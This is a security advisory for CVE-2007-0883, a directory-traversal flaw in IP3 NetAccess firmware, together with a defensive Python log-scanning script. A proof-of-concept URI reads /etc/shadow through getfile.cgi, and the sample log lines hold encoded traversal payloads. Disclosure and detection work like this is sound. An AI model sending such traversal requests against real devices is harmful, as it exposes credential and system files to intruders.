IP3 NetAccess Directory Traversal Vulnerability
BID:22513
Info
| Bugtraq ID: | 22513 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-0883 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 11 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | Sebastian Wolfgarten is credited with the discovery of this vulnerability. |
| Vulnerable: | IP3 Networks NA 4.0 |
| Not Vulnerable: | IP3 Networks NA 4.1.9.6 |
Discussion
IP3 NetAccess is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
A remote attacker could exploit this vulnerability to read files containing sensitive information that could aid further attacks against the affected computer. The attack can be used to obtain arbitrary files from the affected system.
IP3 NetAccess devices with firmware versions earlier than 4.1.9.6 are vulnerable to this issue.
Exploit / POC
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://example.com/portalgroups/portalgroups/getfile.cgi?filename=../../../../../../../../etc/shadow
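A defender's view of the request above, as an added example that is not part of the original advisory or of the vendor's code: it scans web access logs for getfile.cgi requests whose filename parameter resolves outside the served directory. It goes beyond the plain ../ form shown on this page by also decoding percent-encoded input; the Common Log Format layout, the sample lines and the function names are assumptions.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (Common Log Format assumed); not from a real device.
SAMPLE_LOG = """\
192.0.2.10 - - [11/Feb/2007:10:00:01 +0000] "GET /portalgroups/portalgroups/getfile.cgi?filename=logo.png HTTP/1.0" 200 5120
192.0.2.44 - - [11/Feb/2007:10:00:07 +0000] "GET /portalgroups/portalgroups/getfile.cgi?filename=../../../../../../../../etc/shadow HTTP/1.0" 200 1311
192.0.2.44 - - [11/Feb/2007:10:00:09 +0000] "GET /portalgroups/portalgroups/getfile.cgi?filename=%252e%252e%252fetc%252fpasswd HTTP/1.0" 404 0
192.0.2.10 - - [11/Feb/2007:10:00:12 +0000] "GET /index.html?filename=../x HTTP/1.0" 200 88
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so multiply-encoded separators are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_base(filename):
    """True if the name is absolute or climbs above the directory it is served from."""
    name = fully_decode(filename).replace("\\", "/")
    normalized = posixpath.normpath(name)
    return name.startswith("/") or normalized == ".." or normalized.startswith("../")

def find_traversal(log_text, script="getfile.cgi", param="filename"):
    """Return (client, status, decoded filename) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if escapes_base(value):
                hits.append((client, int(status), fully_decode(value)))
    return hits

if __name__ == "__main__":
    for client, status, name in find_traversal(SAMPLE_LOG):
        print(f"{client} status={status} filename={name}")
```

A hit logged with status 200 deserves priority during triage, since it suggests the file content was actually returned.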
Solution / Fix
Solution:
The vendor has released firmware version 4.1.9.6 to address this issue. Please see the references for more information.
References
References:
- Arbitrary file disclosure vulnerability in IP3 NetAccess (IP3 Networks)
- Vendor Home Page (IP3 Networks)
- Arbitrary file disclosure vulnerability in IP3 NetAccess < 4.1.9.6 (Sebastian Wolfgarten)